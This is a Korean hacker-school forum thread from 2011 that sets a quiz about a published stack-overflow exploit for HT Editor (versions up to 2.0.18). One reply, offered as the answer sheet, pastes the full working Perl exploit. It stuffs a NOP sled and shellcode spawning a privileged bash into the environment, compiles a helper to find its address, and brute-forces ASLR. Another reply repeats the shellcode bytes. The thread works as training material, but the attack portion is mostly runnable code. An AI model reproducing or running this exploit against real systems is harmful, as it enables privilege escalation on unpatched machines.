22015,

1/1101

멍멍

http://cyworld.co.kr/codesire

오늘의 해킹 문제

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=20405 [복사]

http://www.exploit-db.com/exploits/17083/

오늘 올라온 0-day 취약점입니다

문제는,

1. 어떤 프로그램에서 취약점이 발견할까요?

2. 어떤 종류의 취약점이 발생할까요?

3. 어떤 파일 포맷에서 발생할까요?

4. 어느 헤더에서 발생할까요?

5. 사용된 쉘코드는?

6. 이 코드는 linux용인가요 windows용인가요?

7. 이 코드가 ASLR을 우회하는 방법은?

Hit : 12103 Date : 2011/03/31 10:44


.Dolphin	해답지 ============================================= # Exploit Title: HT Editor File openning Stack Overflow (0day) # Date: March 30th 2011 # Author: ZadYree # Software Link: <a href=http://hte.sourceforge.net/downloads.html target=_blank>http://hte.sourceforge.net/downloads.html</a> # Version: <= 2.0.18 # Tested on: Linux/Windows (buffer padding may differ on W32) # CVE : None #!/usr/bin/perl =head1 TITLE HT Editor <=2.0.18 0day Stack-Based Overflow Exploit =head2 SYNOPSIS my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H', $retaddr))]; =head1 DESCRIPTION The vulnerability is triggered by a too large argument (+ path) which simply lets you overwrite eip. =head2 AUTHOR ZadYree ~ 3LRVS Team =head3 SEE ALSO ZadYree's blog: z4d.tuxfamily.org 3LRVS blog: 3lrvs.tuxfamily.org Shellcode based on <a href=http://www.shell-storm.org/shellcode/files/shellcode-606.php target=_blank>http://www.shell-storm.org/shellcode/files/shellcode-606.php</a> => Thanks =cut use strict; use warnings; use constant SHELLCODE => "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e". "\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" . "\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" . "\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" . "\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" . "\x53\x52\x54\x8a\xe2\xce\x81"; use constant NOPZ => ("\x90" x 3000); $ENV{'TAPZCODE'} = (NOPZ . SHELLCODE); open(my $fh, ">", "g3tenv.c"); print $fh <<"EOF"; #include <stdio.h> void main() { printf("%x", getenv("TAPZCODE")); } EOF system("gcc g3tenv.c -o g3tenv"); my $retaddr = qx{./g3tenv}; my $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H', $retaddr))]; open(my $as, "<", "/proc/sys/kernel/randomize_va_space"); my $status = <$as>; close($as); unless ($status != 0) { unlink("g3tenv.c", "g3tenv"); exec(@$payload); } print "[]ASLR detected!\012"; print "[]Bruteforcing ASLR...\012"; while (1) { $payload = ["hte", ("A" x (4108 - length(qx{pwd}))) . reverse(pack('H*', $retaddr))]; qx{@$payload}; last unless ($? == 11); } unlink("g3tenv.c", "g3tenv"); die "HAPPY Hacking!";	2011/03/31
prosper	1. HT Editor 2. Stack-Based Overflow 3.??? g3tenv ??? 4.hte 5.Linux x86 - execve("/bin/bash", ["/bin/bash", "-p"], NULL) 6.linux 7. open(my $as, "<", "/proc/sys/kernel/randomize_va_space"); my $status = <$as>; close($as); unless ($status != 0) { unlink("g3tenv.c", "g3tenv"); exec(@$payload); }	2011/03/31
프라이드	1. HT Editor 2. Stack overflow 3. ??? ㅜㅜ 4. ??? ㅜㅜ 5. "\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e". "\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8" . "\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67" . "\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30" . "\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4" . "\x53\x52\x54\x8a\xe2\xce\x81"; 6. Linux 7. Bruteforcing	2011/04/01